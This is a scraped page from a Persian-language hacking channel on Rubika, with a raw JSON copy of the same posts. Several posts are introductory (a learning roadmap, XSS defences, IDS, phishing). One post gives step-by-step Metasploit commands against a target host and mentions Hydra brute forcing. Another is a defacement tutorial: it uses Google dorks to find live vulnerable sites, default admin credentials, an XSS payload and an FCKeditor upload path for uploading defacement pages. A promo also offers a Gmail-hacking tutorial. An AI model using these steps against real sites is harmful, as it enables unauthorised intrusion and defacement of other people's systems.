نکته خطرناک‌تر این است که بسیاری از این حمله‌ها خودپاک‌سازی دارند؛ یعنی پس از اجرا، آثارشان را حذف می‌کنند و حتی ردپایی برای تحلیل امنیتی باقی نمی‌گذارند؛ در نتیجه، کاربر نه‌تنها متوجه حمله نمی‌شود، بلکه گاهی تا مدت‌ها از آلوده‌شدن دستگاه خود بی‌خبر می‌ماند.


@ZERO___DAY
Please open Rubika to view this post
VIEW IN RUBIKA
 
۳۰ اردیبهشت
💻 | هک و امنیت | Linux | 💻
💻 | هک و امنیت | Linux | 💻
## نقشه راه ۳۰ روزه امنیت سایبری (برای تازه‌کارها)computer

هفته اول: مبانی شبکه و سیستم‌عامل

* روز ۱-۲:
* موضوع: مفاهیم پایه شبکه (IP, Port, Protocol, DNS, DHCP)
* منابع: ویدئوهای آموزشی مقدماتی در یوتیوب، مقالات وبلاگ‌های امنیت
* روز ۳-۴:
* موضوع: مدل OSI و TCP/IP
* منابع: همانند روز ۱-۲
* روز ۵-۶:
* موضوع: مقدمه‌ای بر لینوکس (دستورات پایه، فایل سیستم)
* منابع: دوره‌های آنلاین رایگان (مثل edX, Coursera) یا کانال‌های آموزشی لینوکس در تلگرام/یوتیوب
* روز ۷:
* موضوع: مقدمه‌ای بر ویندوز (فایل سیستم، رجیستری، اکانت‌ها)
* منابع: منابع آموزشی مایکروسافت، مقالات

هفته دوم: شروع برنامه‌نویسی و مفاهیم اولیه امنیت

* روز ۸-۱۰:
* موضوع: مقدمه‌ای بر پایتون (متغیرها، انواع داده، شرط‌ها، حلقه‌ها)
* منابع: دوره‌های پایتون مقدماتی (Codecademy, W3Schools, Learn Python the Hard Way)
* روز ۱۱-۱۲:
* موضوع: اسکریپت‌نویسی ساده با پایتون (مثلاً خواندن فایل، پردازش ساده متن)
* منابع: همانند روز ۸-۱۰
* روز ۱۳-۱۴:
* موضوع: مفاهیم پایه امنیت (CIA Triad: Confidentiality, Integrity, Availability, احراز هویت، مجوز)
* منابع: مقالات و ویدئوهای مقدماتی امنیت

هفته سوم: ابزارهای اولیه و اولین گام‌ها در هک اخلاقی

* روز ۱۵-۱۷:
* موضوع: نصب و آشنایی با محیط تست (VirtualBox/VMware + Kali Linux یا Parrot OS)
* منابع: راهنمای نصب Kali/Parrot، ویدئوهای آموزشی
* روز ۱۸-۱۹:
* موضوع: ابزار Nmap (اسکن شبکه، کشف پورت‌ها)
* منابع: مستندات Nmap، آموزش‌های عملی
* روز ۲۰-۲۱:
* موضوع: مقدمه‌ای بر آسیب‌پذیری‌های وب (SQL Injection, XSS - فقط مفاهیم)
* منابع: وب‌سایت OWASP، مقالات مقدماتی

هفته چهارم: تمرین عملی و منابع بیشتر

* روز ۲۲-۲۴:
* موضوع: تمرین عملی با ماشین‌های آسیب‌پذیر (مثلاً Metasploitable2)
* منابع: راهنمای راه‌اندازی Metasploitable، تمرین در محیط آزمایش
* روز ۲۵-۲۷:
* موضوع: مقدمه‌ای بر ابزار Wireshark (تحلیل بسته‌های شبکه)
* منابع: مستندات Wireshark، آموزش‌های تحلیل ترافیک
* روز ۲۸-۲۹:
* موضوع: آشنایی با پلتفرم‌های CTF (Capture The Flag) برای تمرین
* منابع: وب‌سایت‌هایی مثل Hack The Box (سطح آسان)، TryHackMe، OverTheWire
* روز ۳۰:
* موضوع: مرور کلی، جمع‌بندی، و برنامه‌ریزی برای ادامه مسیر
* منابع: مرور یادداشت‌ها، تعیین حوزه‌های علاقه‌مندی (Pentesting, Forensics, Malware Analysis, etc.)

نکات مهم:

* صبور باش: امنیت یک مسیر طولانیه.
* عمل کن: فقط نخون، باید پیاده کنی.
* نترس از اشتباه: اشتباهات بهترین معلم‌ها هستن (تو محیط امن).
* یادگیری مداوم: تکنولوژی عوض میشه، تو هم باید بروز باشی.
* هک اخلاقی: همیشه در چارچوب قانون و با مجوز کار کن.

بعد از این ۳۰ روز، می‌تونی با عمیق‌تر شدن در هر کدوم از این مباحث یا انتخاب یک حوزه تخصصی، مسیرت رو ادامه بدی.


@ZERO___DAY
Please open Rubika to view this post
VIEW IN RUBIKA
 
۳۰ اردیبهشت
💻 | هک و امنیت | Linux | 💻
💻 | هک و امنیت | Linux | 💻
computerپیدا کردن پورت بازunlock

پیدا کردن پورت باز مثل پیدا کردن قفل درب خانه است؛ اما حالا باید کلید مناسب را برای باز کردن آن داشته باشیم.

در دنیای هک، به ابزارهایی که برای نفوذ از طریق پورت‌های باز استفاده می‌شود، Exploit (اکسپلویت) می‌گویند. اما قبل از استفاده از اکسپلویت، باید بدانیم هدف چه نرم‌افزاری دارد و آسیب‌پذیر است یا خیر.

مراحل نفوذ از طریق پورت‌های باز:

۱. شناسایی نسخه دقیق (Reconnaissance):
همانطور که قبلاً گفتیم، اول باید با دستور nmap -sV بفهمیم روی پورت باز چه نسخه‌ای از نرم‌افزار در حال اجراست.
مثلاً:
Apache httpd 2.4.7 (قدیمی و آسیب‌پذیر)
Apache httpd 2.4.58 (جدید و امن)

۲. جستجو در دیتابیس آسیب‌پذیری (CVE Search):
وقتی فهمیدیم نسخه نرم‌افزار قدیمی است، باید ببینیم آیا برای آن باگ امنیتی کشف شده است یا خیر. سایت‌هایی مثل CVE Details یا Exploit-DB وجود دارند که لیست تمام باگ‌ها را دارند.
مثلاً اگر جستجو کنید "Apache 2.4.7 vulnerability"، ممکن است با کدی مواجه شوید که به هکر اجازه می‌دهد دسترسی روت بگیرد.

۳. استفاده از ابزارهای خودکار (Metasploit):
به جای نوشتن کد از صفر، ما از ابزاری قدرتمند به نام Metasploit Framework در کالی لینوکس استفاده می‌کنیم. این ابزار هزاران اکسپلویت آماده دارد.

* مرحله ۱: باز کردن Metasploit:
msfconsole

* مرحله ۲: جستجوی اکسپلویت مربوط به نرم‌افزار هدف:
search type:exploit platform:windows apache

* مرحله ۳: انتخاب اکسپلویت مناسب:
use exploit/windows/http/apache_mod_cgi_bash_env_exec

* مرحله ۴: تنظیم آدرس هدف (RHOSTS):
set RHOSTS 192.168.1.105

* مرحله ۵: اجرای حمله:
exploit

اگر نسخه نرم‌افزار هدف آسیب‌پذیر باشد، این دستور یک پشت‌پرده (Backdoor) برای شما باز می‌کند و دسترسی Shell (خط فرمان) به سیستم می‌دهد.

۴. حمله Brute Force (تست رمز عبور):
اگر اکسپلویت خاصی برای نرم‌افزار پیدا نکردید، می‌توانید روی پورت‌هایی مثل SSH (۲۲) یا FTP (۲۱) حمله Brute Force انجام دهید.
ابزاری مثل Hydra در کالی این کار را می‌کند. این ابزار هزاران رمز عبور را از یک لیست روی پورت باز امتحان می‌کند تا رمز درست را پیدا کند.

نکته بسیار مهم امنیتی:
همانطور که می‌بینید، نفوذ به سیستم‌ها از طریق پورت‌های باز کاملاً ممکن است، اما فقط زمانی که:
۱. نرم‌افزارها قدیمی و آپدیت نباشند.
۲. رمز عبورها ضعیف باشند.
۳. پورت‌های غیرضروری باز باشند.

بنابراین بهترین راه دفاع، آپدیت مداوم سیستم و بستن پورت‌های غیرضروری است.

تمرین:
در کالی لینوکس، دستور msfconsole را بزنید و با محیط آن آشنا شوید. (توجه: فقط روی سیستم‌های مجازی خودتان تست کنید).



@ZERO____DAY
Please open Rubika to view this post
VIEW IN RUBIKA
 
۳۰ اردیبهشت
💻 | هک و امنیت | Linux | 💻
💻 | هک و امنیت | Linux | 💻
dart انواع اصلی XSS

1️⃣
Reflected XSS
- کد مخرب در URL یا پارامترهای درخواست قرار می‌گیرد
- نیاز به فریب کاربر برای کلیک روی لینک آلوده
- مثال:



https://example.com/search?q=<script>alert(1)</script>


2️⃣ Stored XSS
- کد مخرب در دیتابیس ذخیره می‌شود
- تمام کاربرانی که صفحه را مشاهده می‌کنند تحت تأثیر قرار می‌گیرند
- مثال: کامنت‌های آلوده در وبلاگ

3️⃣ DOM-Based XSS
- آسیب‌پذیری در سمت کلاینت بدون نیاز به ارتباط با سرور
- ناشی از پردازش ناامن داده‌ها توسط JavaScript



bomb پیامدهای XSS
heavy_check_mark️ سرقت کوکی‌ها و نشست کاربران
heavy_check_mark️ تغییر محتوای صفحات وب
heavy_check_mark️ اجرای عملیات به نام کاربر
heavy_check_mark️ ریدایرکت به سایت‌های مخرب
heavy_check_mark️ دانلود بدافزار



🛡️ راهکارهای دفاعی

برای توسعه‌دهندگان:
اعتبارسنجی و سانیتایز تمام ورودی‌های کاربر
استفاده از textContent به جای innerHTML
پیاده‌سازی CSP (Content Security Policy)
تنظیم کوکی‌ها با HttpOnly و Secure Flag

برای کاربران:
عدم کلیک روی لینک‌های مشکوک
به‌روزرسانی مرورگر و افزونه‌ها
استفاده از افزونه‌های امنیتی مانند NoScript


mag تشخیص XSS
تست ورودی‌ها با پیلودهای ساده:

html
<script>alert(1)</script>

استفاده از ابزارهای اسکن مانند:
- Burp Suite
- OWASP ZAP
- XSStrike


@ZERO___DAY
Please open Rubika to view this post
VIEW IN RUBIKA
 
۱ خرداد
💻 | هک و امنیت | Linux | 💻
💻 | هک و امنیت | Linux | 💻
#هک سایت
beginnerاموزش هک سایت با باگ های rfu, poto , xssbeginner

beginnerباگ xss point_down🏿

oneوارد گوگل شید و دورک زیر رو سرچ میکنینpoint_down🏿

inurl:"/showcatrows.php?CategoryID="

two وقتی که این دورک رو تو گوگل سرچ کردید, تارگت هایی با باگه xss میاره که شما رو یکیشون کلیک میکنین و به اخره سایت اینو اضافه میکنینpoint_down🏿

"><marquee><h1>power</h1></mmarque

100شما بجای power که نوشتم میتونید لقب خودتون رو بنویسید

beginnerباگ poto point_down🏿

oneوارده گوگل شید و یکی از دورک های زیر رو سرچ کنیدpoint_down🏿
inurl:"poto" intext:"powered by Shop737"
inurl:"poto" intext:"powered by Bisnis7 "
inurl:"poto" intext:"powered by StudioWeb "
twoچند تا سایت میاره رو یکی به دلخواه کلیک کنید

threeبعد این رو اخره سایت اضافه کنیدpoint_down🏿
poto/upload.php

threeبعد اینتر رو بزنید

fourیه صفحه میاد ک ازتون یوزرنیم و پسوورد میخواد
که هر دو رو ادمین وارد میکنید
(admin)

100اگه درست نبود برید سراغ سایت بعدی اگرم درست بود یه صفحه باز میشه میتونید فایل اپلود کنید

exclamation️اگر زبانه
html یا php
رو بلدید ک میتونید یه فایل با فرمته
.html
exclamation️بسازید و اپلود کنید اگرم نه باید برید یاد بگیرید

beginnerباگ rfupoint_down🏿

oneوارد گوگل شید و دورک زیر رو search کنیدpoint_down🏿
inurl:frame=product_detail
twoحالا یکی از سایت هارو انتخاب کنید و آخر سایت رو پاک کنید🤟🏿

threeوقتی پاک کردید اکسپلویت زیر رو بهش اضافه کنیدpoint_down🏿
/jscripts/FCKeditor/editor/filemanager/upload/test.html

fourخب حالا دیفیس خودتون رو با پسوند .html آپلود کنیدok_hand🏿




@ZERO____DAY
Please open Rubika to view this post
VIEW IN RUBIKA
 
۴ خرداد
💻 | هک و امنیت | Linux | 💻
💻 | هک و امنیت | Linux | 💻
IDS 🕵️

سیستم‌های تشخیص نفوذ یا همان IDS، مثل نگهبان‌های شبکه عمل می‌کنن که ترافیک رو برای پیدا کردن فعالیت‌های مشکوک زیر نظر دارن. ترافیک عبوری شبکه رو انالیز میکنن، براساس db که دارن فعالیت های مشکوک یا غیر عادی رو تشخیص میدن و به ادمین سرور از طریق ایمیل یا ... نوتیف میفرستن🛡️

انواع IDS بر اساس عملکرد:
• اکتیو (Active): علاوه بر تشخیص، جلوی حمله رو می‌گیره و تغییراتی مثل مسدود کردن IP مهاجم اعمال می‌کنه. 🛑
• پسیو (Passive): فقط نظارت می‌کنه و در صورت مشاهده مورد مشکوک، هشدار میده؛ دخالتی در شبکه نداره. bell

🤖 انواع IDS بر اساس محل استقرار:
• HIDS (Host-based): روی یک سیستم خاص نصب میشه و فایل‌ها و لاگ‌های همون سیستم رو بررسی می‌کنه. computer
• NIDS (Network-based): در نقاط استراتژیک شبکه قرار می‌گیره تا تمام ترافیک عبوری رو مانیتور کنه. globe_with_meridians

⚙️ ابزار Wazuh یک پلتفرم متن‌باز و فوق‌العاده برای امنیت است که ترکیبی از HIDS و NIDS رو ارائه میده. امکانات اصلیش ایناست:
۱. مدیریت لاگ‌ها (Log Analysis) memo
۲. تشخیص نفوذ و بدافزار mag
۳. پایش یکپارچگی فایل‌ها (FIM) open_file_folder
۴. ارزیابی آسیب‌پذیری سیستم‌ها 🛡️
۵. انطباق با استانداردهای امنیتی مثل PCI DSS و HIPAA bookmark_tabs
۶. پاسخگویی خودکار به تهدیدات zap


@ZERO____DAY
Please open Rubika to view this post
VIEW IN RUBIKA
 
۴ خرداد
💻 | هک و امنیت | Linux | 💻
💻 | هک و امنیت | Linux | 💻
1. حمله مرد میانی (Man-in-the-Middle - MITM) 🕵️‍♂️

سناریو باحال: تصور کن دوست داری با نفر بغلیت قایم‌موشک بازی کنی، ولی یه نفر وسط راه می‌ایستد و به هر دو شما می‌گوید: «من دوست شما هستم! حرفاتون رو به من بگید تا بهش برسونم» - بعد خودش پیام‌ها رو می‌خونه و عوض می‌کنه!

در واقعیت: هکر بین شما و سایت بانک قرار می‌گیره. شما فکر می‌کنید دارید رمز رو به بانک می‌دید، اما دارید به هکر می‌دید. هکر هم بعداً با رمز شما وارد حسابتون می‌شه.

مثل یه فیلم جاسوسی: شخصیت شرور وسط تماس تلفنی قهرمان قرار می‌گیره و خودش رو به جای هر دو طرف جا می‌زنه!

---

2. حمله محروم‌سازی از سرویس (DDoS) boom

سناریو باحال: فرض کن رستوران محبوبت فقط ۵ صندلی داره. ناگهان ۱۰۰۰ نفر همزمان وارد می‌شن، فقط می‌شینن و سفارش نمی‌دن! مشتریای واقعی هیچ جا نمی‌تونن بشینن و رستوران عملاً فلج می‌شه.

در واقعیت: هکر با هزاران کامپیوتر آلوده (بوت‌نت) همزمان به یه سایت حمله می‌کنه. سرور نتونسته جواب همه رو بده و برای کاربرای واقعی از کار می‌افته.

مثل یه فیلم اکشن: گروه بدجنس‌ها همزمان از همه درها وارد ساختمان می‌شن تا نیروهای امنیتی نتونن جلوی ورود آدم اصلی رو بگیرن!

---

3. حمله فیشینگ (Phishing) fishing_pole_and_fish

سناریو باحال: یه نفر میاد بهت می‌گه: «سلام! من مدیر سیستمم. رمزت رو بده ببینم درست ثبت شده یا نه» - با لباس فرم و کارت شناسایی جعلی! تو هم اعتماد می‌کنی و رمزت رو میدی...

در واقعیت: ایمیل جعلی از طرف «اداره فناوری دانشگاه» برات میاد: «رمز عبور شما منقضی شده، روی لینک کلیک کن تا عوض کنی». لینک یه سایت قلابی درست شبیه سایت اصلیه، رمزت رو که وارد کنی، میره دست هکر.

مثل یه فیلم کلاهبرداری: جایی که یه نفر با لباس پلیس جعلی، وسایل مردم رو «بازرسی» می‌کنه و می‌دزددشون!


@ZERO____DAY
Please open Rubika to view this post
VIEW IN RUBIKA
 
۴ خرداد
💻 | هک و امنیت | Linux | 💻
💻 | هک و امنیت | Linux | 💻


هر قطعه ای که وصل میشه یک فکر نو متولد میشهzap
به کانال ما کانال موزش رباتیک خوش امدید ...fire
اگه اومدی آموزش هایه رباتیک رو یاد بگیری جایه خوبی اومدیwhite_check_mark


این کانال به شما کمک میکند تا مفاهیم را بهتر درک کنید و بهتر متوجه ساختار ربات ها شوید و در ساخت وسیله ها بسیار به شماکمک میکندok_hand100


اگر سوالی داشتید و یا جهت تبلیغات پیوی بنده مراجعه کنید با تشکر white_check_mark
ایدی صاحب کانال : @mohamadreza_2436
ایدی کانال : @xgghjujjyj


اگر میخواهید از این آموزش ها بهره ببرید به این کانال بپیوندید 100
Please open Rubika to view this post
VIEW IN RUBIKA
 
۴ خرداد
💻 | هک و امنیت | Linux | 💻
💻 | هک و امنیت | Linux | 💻
امار 1.6k که 54 نفر مونده تا 1.6k اگه بشیم یه اموزش هک جیمیل میزارم واستون.rosewhite_check_mark
Please open Rubika to view this post
VIEW IN RUBIKA
edited  
۵ خرداد
💻 | هک و امنیت | Linux | 💻
💻 | هک و امنیت | Linux | 💻
اگه حمایت نشیم نه اموزش ها رو زیاد می‌کنیم و نه فعالیت میکنیم.
Please open Rubika to view this post
VIEW IN RUBIKA
 
💻 | هک و امنیت | Linux | 💻
💻 | هک و امنیت | Linux | 💻
@ZERO____DAY
2Kدنبال کننده

آموزش زبانهای مختلف از جمله پایتون ، جاوا و... هک اخلاقی و امنیت ، برنامه_نویسی کد_نویسی و...
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
large_blue_diamond️ جهت تبادل و تبلیغات: @ZERO___DAY
large_blue_diamond️ ارتباط با مدیریت: @ZERO___DAY
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
#تابع_قوانین_جمهوری_اسلامی_ایران
#تابع_قوانین_روبیکا
مشاهده کانال پیام‌رسان
درباره ما
وبلاگ
اپلیکیشن ها
\n \n\n2️⃣ Stored XSS \n - کد مخرب در دیتابیس ذخیره می‌شود \n - تمام کاربرانی که صفحه را مشاهده می‌کنند تحت تأثیر قرار می‌گیرند \n - مثال: کامنت‌های آلوده در وبلاگ \n\n3️⃣ DOM-Based XSS \n - آسیب‌پذیری در سمت کلاینت بدون نیاز به ارتباط با سرور \n - ناشی از پردازش ناامن داده‌ها توسط JavaScript \n\n\n\n💣 پیامدهای XSS \n✔️ سرقت کوکی‌ها و نشست کاربران \n✔️ تغییر محتوای صفحات وب \n✔️ اجرای عملیات به نام کاربر \n✔️ ریدایرکت به سایت‌های مخرب \n✔️ دانلود بدافزار \n\n\n\n🛡️ راهکارهای دفاعی \n\nبرای توسعه‌دهندگان: \nاعتبارسنجی و سانیتایز تمام ورودی‌های کاربر \nاستفاده از textContent به جای innerHTML \nپیاده‌سازی CSP (Content Security Policy) \nتنظیم کوکی‌ها با HttpOnly و Secure Flag \n\nبرای کاربران: \n عدم کلیک روی لینک‌های مشکوک \n به‌روزرسانی مرورگر و افزونه‌ها \n استفاده از افزونه‌های امنیتی مانند NoScript \n\n\n🔍 تشخیص XSS \nتست ورودی‌ها با پیلودهای ساده: \n \nhtml\n \n \nاستفاده از ابزارهای اسکن مانند: \n - Burp Suite \n - OWASP ZAP \n - XSStrike\n\n\n@ZERO___DAY","time":"1779307461","is_edited":false,"type":"Text","metadata":{"meta_data_parts":[{"from_index":21,"length":1189,"type":"Quote"}]},"allow_transcription":false,"has_link":true,"share_link":"BHDJBGDIHGEHIBFF"},{"message_id":"1739160874797155","text":"💻پیدا کردن پورت باز🔓\n\nپیدا کردن پورت باز مثل پیدا کردن قفل درب خانه است؛ اما حالا باید کلید مناسب را برای باز کردن آن داشته باشیم.\n\nدر دنیای هک، به ابزارهایی که برای نفوذ از طریق پورت‌های باز استفاده می‌شود، Exploit (اکسپلویت) می‌گویند. اما قبل از استفاده از اکسپلویت، باید بدانیم هدف چه نرم‌افزاری دارد و آسیب‌پذیر است یا خیر.\n\nمراحل نفوذ از طریق پورت‌های باز:\n\n۱. شناسایی نسخه دقیق (Reconnaissance):\nهمانطور که قبلاً گفتیم، اول باید با دستور nmap -sV بفهمیم روی پورت باز چه نسخه‌ای از نرم‌افزار در حال اجراست.\nمثلاً:\nApache httpd 2.4.7 (قدیمی و آسیب‌پذیر)\nApache httpd 2.4.58 (جدید و امن)\n\n۲. جستجو در دیتابیس آسیب‌پذیری (CVE Search):\nوقتی فهمیدیم نسخه نرم‌افزار قدیمی است، باید ببینیم آیا برای آن باگ امنیتی کشف شده است یا خیر. سایت‌هایی مثل CVE Details یا Exploit-DB وجود دارند که لیست تمام باگ‌ها را دارند.\nمثلاً اگر جستجو کنید \"Apache 2.4.7 vulnerability\"، ممکن است با کدی مواجه شوید که به هکر اجازه می‌دهد دسترسی روت بگیرد.\n\n۳. استفاده از ابزارهای خودکار (Metasploit):\nبه جای نوشتن کد از صفر، ما از ابزاری قدرتمند به نام Metasploit Framework در کالی لینوکس استفاده می‌کنیم. این ابزار هزاران اکسپلویت آماده دارد.\n\n* مرحله ۱: باز کردن Metasploit:\n msfconsole\n\n* مرحله ۲: جستجوی اکسپلویت مربوط به نرم‌افزار هدف:\n search type:exploit platform:windows apache\n\n* مرحله ۳: انتخاب اکسپلویت مناسب:\n use exploit/windows/http/apache_mod_cgi_bash_env_exec\n\n* مرحله ۴: تنظیم آدرس هدف (RHOSTS):\n set RHOSTS 192.168.1.105\n\n* مرحله ۵: اجرای حمله:\n exploit\n\nاگر نسخه نرم‌افزار هدف آسیب‌پذیر باشد، این دستور یک پشت‌پرده (Backdoor) برای شما باز می‌کند و دسترسی Shell (خط فرمان) به سیستم می‌دهد.\n\n۴. حمله Brute Force (تست رمز عبور):\nاگر اکسپلویت خاصی برای نرم‌افزار پیدا نکردید، می‌توانید روی پورت‌هایی مثل SSH (۲۲) یا FTP (۲۱) حمله Brute Force انجام دهید.\nابزاری مثل Hydra در کالی این کار را می‌کند. این ابزار هزاران رمز عبور را از یک لیست روی پورت باز امتحان می‌کند تا رمز درست را پیدا کند.\n\nنکته بسیار مهم امنیتی:\nهمانطور که می‌بینید، نفوذ به سیستم‌ها از طریق پورت‌های باز کاملاً ممکن است، اما فقط زمانی که:\n۱. نرم‌افزارها قدیمی و آپدیت نباشند.\n۲. رمز عبورها ضعیف باشند.\n۳. پورت‌های غیرضروری باز باشند.\n\nبنابراین بهترین راه دفاع، آپدیت مداوم سیستم و بستن پورت‌های غیرضروری است.\n\nتمرین:\nدر کالی لینوکس، دستور msfconsole را بزنید و با محیط آن آشنا شوید. (توجه: فقط روی سیستم‌های مجازی خودتان تست کنید).\n\n\n\n@ZERO____DAY","time":"1779307408","is_edited":false,"type":"Text","metadata":{"meta_data_parts":[{"from_index":24,"length":2296,"type":"Quote"}]},"allow_transcription":false,"has_link":true,"share_link":"BHDJBGAIHEHJHBFF"},{"message_id":"1739152871006155","text":"## نقشه راه ۳۰ روزه امنیت سایبری (برای تازه‌کارها)💻\n\nهفته اول: مبانی شبکه و سیستم‌عامل\n\n* روز ۱-۲:\n * موضوع: مفاهیم پایه شبکه (IP, Port, Protocol, DNS, DHCP)\n * منابع: ویدئوهای آموزشی مقدماتی در یوتیوب، مقالات وبلاگ‌های امنیت\n* روز ۳-۴:\n * موضوع: مدل OSI و TCP/IP\n * منابع: همانند روز ۱-۲\n* روز ۵-۶:\n * موضوع: مقدمه‌ای بر لینوکس (دستورات پایه، فایل سیستم)\n * منابع: دوره‌های آنلاین رایگان (مثل edX, Coursera) یا کانال‌های آموزشی لینوکس در تلگرام/یوتیوب\n* روز ۷:\n * موضوع: مقدمه‌ای بر ویندوز (فایل سیستم، رجیستری، اکانت‌ها)\n * منابع: منابع آموزشی مایکروسافت، مقالات\n\nهفته دوم: شروع برنامه‌نویسی و مفاهیم اولیه امنیت\n\n* روز ۸-۱۰:\n * موضوع: مقدمه‌ای بر پایتون (متغیرها، انواع داده، شرط‌ها، حلقه‌ها)\n * منابع: دوره‌های پایتون مقدماتی (Codecademy, W3Schools, Learn Python the Hard Way)\n* روز ۱۱-۱۲:\n * موضوع: اسکریپت‌نویسی ساده با پایتون (مثلاً خواندن فایل، پردازش ساده متن)\n * منابع: همانند روز ۸-۱۰\n* روز ۱۳-۱۴:\n * موضوع: مفاهیم پایه امنیت (CIA Triad: Confidentiality, Integrity, Availability, احراز هویت، مجوز)\n * منابع: مقالات و ویدئوهای مقدماتی امنیت\n\nهفته سوم: ابزارهای اولیه و اولین گام‌ها در هک اخلاقی\n\n* روز ۱۵-۱۷:\n * موضوع: نصب و آشنایی با محیط تست (VirtualBox/VMware + Kali Linux یا Parrot OS)\n * منابع: راهنمای نصب Kali/Parrot، ویدئوهای آموزشی\n* روز ۱۸-۱۹:\n * موضوع: ابزار Nmap (اسکن شبکه، کشف پورت‌ها)\n * منابع: مستندات Nmap، آموزش‌های عملی\n* روز ۲۰-۲۱:\n * موضوع: مقدمه‌ای بر آسیب‌پذیری‌های وب (SQL Injection, XSS - فقط مفاهیم)\n * منابع: وب‌سایت OWASP، مقالات مقدماتی\n\nهفته چهارم: تمرین عملی و منابع بیشتر\n\n* روز ۲۲-۲۴:\n * موضوع: تمرین عملی با ماشین‌های آسیب‌پذیر (مثلاً Metasploitable2)\n * منابع: راهنمای راه‌اندازی Metasploitable، تمرین در محیط آزمایش\n* روز ۲۵-۲۷:\n * موضوع: مقدمه‌ای بر ابزار Wireshark (تحلیل بسته‌های شبکه)\n * منابع: مستندات Wireshark، آموزش‌های تحلیل ترافیک\n* روز ۲۸-۲۹:\n * موضوع: آشنایی با پلتفرم‌های CTF (Capture The Flag) برای تمرین\n * منابع: وب‌سایت‌هایی مثل Hack The Box (سطح آسان)، TryHackMe، OverTheWire\n* روز ۳۰:\n * موضوع: مرور کلی، جمع‌بندی، و برنامه‌ریزی برای ادامه مسیر\n * منابع: مرور یادداشت‌ها، تعیین حوزه‌های علاقه‌مندی (Pentesting, Forensics, Malware Analysis, etc.)\n\nنکات مهم:\n\n* صبور باش: امنیت یک مسیر طولانیه.\n* عمل کن: فقط نخون، باید پیاده کنی.\n* نترس از اشتباه: اشتباهات بهترین معلم‌ها هستن (تو محیط امن).\n* یادگیری مداوم: تکنولوژی عوض میشه، تو هم باید بروز باشی.\n* هک اخلاقی: همیشه در چارچوب قانون و با مجوز کار کن.\n\nبعد از این ۳۰ روز، می‌تونی با عمیق‌تر شدن در هر کدوم از این مباحث یا انتخاب یک حوزه تخصصی، مسیرت رو ادامه بدی.\n\n\n@ZERO___DAY","time":"1779307284","is_edited":false,"type":"Text","metadata":{"meta_data_parts":[{"from_index":54,"length":2605,"type":"Quote"}]},"allow_transcription":false,"share_link":"BHDJBFCIHBAAGBFF"},{"message_id":"1739142868193155","text":"چجوری افراد مهم هک میشن ؟\nمگه به اونا آموزش داده نمیشه ؟\nیعنی اونا انقد سواد پایین دارن که لینک یا فایل باز و دانلود میکنن ؟\n\n\nبله همه اونها آموزش ها رو دیدن و طبیعتا هیچ فایلی رو باز نمیکنن \nپس این سوال پیش میاد \nچجوری هک میشن ؟\nــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــ\nاینجاس که زیرو کلیک وارد میشه \n \nزیرو کلیک چیه حالا ؟\n\nفرض کنید شما یک مسئول اسرائیلی هستید و داخل یک برنامه اسرائیلی که برنامه ملی شما هست فعالیت دارید \nمثل ما که از روبیکا استفاده میکنیم و یا اپلیکیشن های دیگه مثل سروش،ایتا،بله و.......\n\nحالا هکر های دولتی که کارشون درسته میان از آسیب پذیری زیرو دی داخل اون برنامه ملی که اون مسئول اکانت داره استفاده میکنن \n\nو از اونجایی که برای استفاده از اپلیکیشن خود به خود دسترسی ها رو باید داد و این هکر ها میان از آسیب پذیری زیرو دی استفاده میکنن میرن سراغ اکانت اون شخص و از اون دسترسی هایی که برنامه داده استفاده میکنن و تمام اون مسئول به فاک رفت یعنی چیز به فنا رفت 👍\n\nــــــــــــــــــــــــــــــــ\n\nحالا این توضیحات رو کمی متفاوت از زبان سایت ایرانیکارت بشنویم 👇\n\nحمله بدون کلیک چه نوع حمله‌ای است؟\nحمله بدون کلیک (Zero-Click Attack) نوعی حمله سایبری است که بدون هیچ‌گونه اقدام یا کلیک از سوی کاربر انجام می‌شود. در این نوع حمله، تنها دریافت یک پیام، تماس یا فایل مخرب کافی‌ست تا مهاجم کنترل بخشی از سیستم قربانی را در دست بگیرد؛ بدون آن‌که کاربر حتی متوجه وقوع حمله شود.\n\nاین حملات معمولاً از طریق آسیب‌پذیری‌های ناشناخته در اپلیکیشن‌های پیام‌رسان، ایمیل، سیستم‌عامل یا حتی خدمات ابری اجرا می‌شوند. تفاوت اصلی آن‌ها با سایر حملات این است که نیازی به بازکردن لینک، بارگذاری فایل یا تایید کاربر ندارند؛ همین ویژگی باعث خواهد شد تا حمله‌های بدون کلیک بسیار دشوارتر از سایر روش‌ها شناسایی شوند و تهدیدی جدی برای حریم خصوصی افراد و سازمان‌ها به‌حساب بیایند.\n\nحملات بدون کلیک\n\nحمله بدون کلیک چگونه کار می‌کند؟\nدر بسیاری از حملات سایبری معمول، مهاجم ابتدا کاربر را فریب می‌دهد تا روی یک لینک کلیک یا پیوست مشکوکی را باز کند؛ اما در حمله بدون کلیک، هیچ تعامل انسانی نیاز نیست. این نوع حمله مستقیماً از طریق شکاف‌های امنیتی در نرم‌افزارهایی انجام می‌شود که ورودی‌های خارجی را پردازش می‌کنند؛ بدون آن‌که کاربر حتی متوجه دریافت فایل یا پیام آلوده شود.\n\nاپلیکیشن‌هایی مانند پیام‌رسان‌ها، برنامه‌های ایمیل یا حتی برخی سرویس‌های سیستمی، معمولاً داده‌هایی را از منابع ناشناس دریافت می‌کنند و پیش از آن‌که کاربر آن‌ها را باز کند، اطلاعات را جهت نمایش آماده خواهند کرد. اگر در فرایند پردازش این داده‌ها، آسیب‌پذیری وجود داشته باشد، مهاجم می‌تواند با طراحی یک پیام یا تماس مخرب، کدی را در دستگاه قربانی اجرا کند؛ به‌عبارت‌دیگر، تنها دریافت یک پیام آلوده می‌تواند به اجرای بدافزار، غیرفعال‌کردن به‌روزرسانی‌ها یا حتی نصب باج‌افزار، بدون آن‌که پیامی باز شده یا دکمه‌ای لمس شده باشد، منجر شود.\n\nنکته خطرناک‌تر این است که بسیاری از این حمله‌ها خودپاک‌سازی دارند؛ یعنی پس از اجرا، آثارشان را حذف می‌کنند و حتی ردپایی برای تحلیل امنیتی باقی نمی‌گذارند؛ در نتیجه، کاربر نه‌تنها متوجه حمله نمی‌شود، بلکه گاهی تا مدت‌ها از آلوده‌شدن دستگاه خود بی‌خبر می‌ماند.\n\n\n@ZERO___DAY","time":"1779307192","is_edited":false,"type":"Text","metadata":{"meta_data_parts":[{"from_index":127,"length":2755,"type":"Quote"}]},"allow_transcription":false,"share_link":"BHDJBECIGIBJDBFF"},{"message_id":"1664157924697155","text":"💻سیستم عامل لینوکس 